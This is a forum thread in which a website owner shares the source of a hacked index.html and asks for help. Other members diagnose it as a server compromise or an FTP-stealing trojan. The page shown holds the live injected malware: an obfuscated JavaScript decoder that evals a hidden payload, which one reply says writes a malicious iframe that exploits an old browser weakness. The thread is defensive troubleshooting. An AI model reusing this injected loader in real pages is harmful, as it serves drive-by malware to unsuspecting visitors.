What does this code in index.html means

F

flamtech

Well-Known Member
Joined
Jul 25, 2005
Messages
272
Reaction score
0
Look at the part that starts with <body><script language=JavaScript>
<html>

<head>
<meta http-equiv="Content-Language" content="en-za">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body><script language=JavaScript>function dwbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,61,52,34,56,45,51,58,46,35,0,0,0,0,0,0,8,62,49,44,4,20,1,28,31,12,37,47,42,41,60,59,33,17,55,36,16,6,0,57,14,43,27,0,0,0,0,26,0,9,29,18,54,30,21,11,5,40,10,22,38,15,13,53,23,32,48,2,39,19,25,24,3,7,50);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(233^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}dwbn15('es4Pn_ityYvt@dat_c565_4PI7C2n_i3Gc@9ydWBe8aqbzwrXpnqm8a3Dzwzy3@PIcndIdb9nlClZL@ogywtblW2UZI3nd@Bj_4Pbz4PbcN9VkwtI8WByzwtURMBkOCrS3wtFeNlUzWPnUIM@dvqyKa3ydiPDUIrxObRZtnrsOIdIdb9n7CrXKGzesw9bU@owRbday@9V7wqbcnR_tClbsvPIc1znsilvk@3TX1PUe@9gHboUx49Z3@PIe56Vx') </script><!-- infobay.co.za -->

<p align="center">INFOBAY.CO.ZA</p>

<p align="center">&nbsp;</p>

<p align="center">&nbsp;</p>

<p align="center"><A HREF="http://www.myhpf.co.uk/banner.asp?friend=129476">
<IMG SRC="http://www.myhpf.co.uk/banners/60x468.gif" BORDER="0" width="468" height="60">
</A>
</p>

<p align="center">Links</p>

<p align="center"><a target="_blank" href="http://www.gratisfax.co.za">
www.gratisfax.co.za</a><br>
<a target="_blank" href="http://www.earn-while-you-surf.com">
www.earn-while-you-surf.com</a><br>
<a target="_blank" href="http://www.earnwhileyousearch.com/">
earnwhileyousearch.com</a></p>

<p align="center">2</p>

<p align="center">&nbsp;</p>

</body>

</html>
Click to expand...

About two weeks ago I had a look at the source code of my webpage, and I found some strange looking code in the body. With further investigation, I found that all the index.html files off all the domains hosted at the same company has this strange code in the heading. I also found strange folders with php files in them.

After I have deleted all the files not belonging there, I used a FTP program to publish the index.html again.

I also switched of the Frontpage Extensions on the servers.

I also have a feedback form that I created with the help of http://www.thesitewizard.com/ on another domain.

Today I received a strange response from the feedback form with this message. Then I had a look at my index.html, and sure enough, the code is back again.
flTC5u <a h r e f="http://rvoslavykkut.com/">rvoslavykkut</a>, [u r l=http://nthyykwtansd.com/]nthyykwtansd[/u r l], [l i n k=h t t p://klmzmwcoewyq.com/]klmzmwcoewyq[/link], [u r l]h t t p://volxzdddnxmr.com/[/url]
Click to expand...

What is also interesting is that the comment <!--- infobay.co.za --> is present in all the code on the different domains.

So I wonder if the feedback form is the way into my source code.

Somebody suggested that there is a bot on my computer that uses my FTP login and pwd to update my webpage’s.

I had a updated Norton 360 version on my computer. I uninstalled that and then installed Avast, but I could not find any virus.

I will now download ESET smart security to do a scan.

Any help will be appreciated.
 
Sounds like the hosting company's servers have been compromised. Or likely hackers have broken into your web hosts' administrative side
 
Turiko said:
Sounds like the hosting company's servers have been compromised. Or likely hackers have broken into your web hosts' administrative side
Click to expand...

+1

I've seen this JS code before, and in that hackers had compromised server.
 
Contact your hosting provider with this information, and have them take a look at their security - chances are they'll find something...
 
Raithlin said:
Contact your hosting provider with this information, and have them take a look at their security - chances are they'll find something...
Click to expand...
I doubt whether they will admit to problem at their side.
This is their answer:
Thank you for contacting us.

It looks like you have trojan installed on your local computer where from you usually access ftp of your account. It is absolutely new kind of trojan-bot that after connecting to your ftp scan all folders and change/delete index pages.
You need to change all passwords, install newest updates of antivirus software and scan computers where from ftp of account is being accessed. Clear Internet Explorer History and files, if needed.
You may read details about this issue here: http://ethanzuckerman.com/blog/?p=1346

Should you have any further questions, please feel free to contact us anytime, we are available 24/7.

Kind regards,
Elena Obilets
Click to expand...

I don’t buy their story.

Norton 360 didn’t report any Trojans.
Avast didn’t report any Trojans
ESET NOD32 have just finished and it did not report any Trojans, or any virus for that matter.

The link they gave me talks about the “Russian Business Network”. What I find intriguing is that my hosting company’s 24/7 live support is done from somewhere in the old USSR. Coincidence!?

Earlier this year a spammer gained access to one of my email accounts, and used it to send 419 scams from my email server. This stopped after I changed my password. So I think it is time to change my hosting company but…it is a pain to setup all the accounts again.

I am now using Google Chrome as my default browser.
 
And now you know why I despise hosting companies, especially American ones. They always deny there's a problem and blame you.
If I can make a suggestion here, speak to Texo and get your site(s) moved. Alternatively host them yourself like I do.

I can tell you now, I've had so much less kark in my life since doing my own hosting.
 
McGuywer said:
FYI,

Google Chrome says INFOBAY.CO.ZA has malware.

The JS Script is encrypted.

I will search some more...
Click to expand...

obfusticated :)

But you're partically right.. the obfusticated javascript picks out different letters from p in that weird for loop into a string c. It then runs the resulting c which document.writes an iframe onto the page which points to some other site... http://add-content-filter.net/t/?xxxxxxxx.

The xxxxx part seems randomized. Chrome is probably reporting add-content-filter.net , not infobay (im really not sure what that one).

Looking deeper it seems to be exploiting an old browser weakness which makes it run remote malicious code.

If you're sure access to the site wasn't from your side then I'd suggest you change your service provider asap
 
Raithlin said:
Sho't Left. :D That sudden change in topic left me with whiplash!
Click to expand...

Sorry :) With reference to this part of the article, I decided to use Chrome instead.
Some of these attacks take advantage of specific features in the Internet Explorer browser to allow the hostile code to load on your machine.
Click to expand...
 
You must log in or register to reply here.
Back
Top
Sign up to the MyBroadband newsletter
X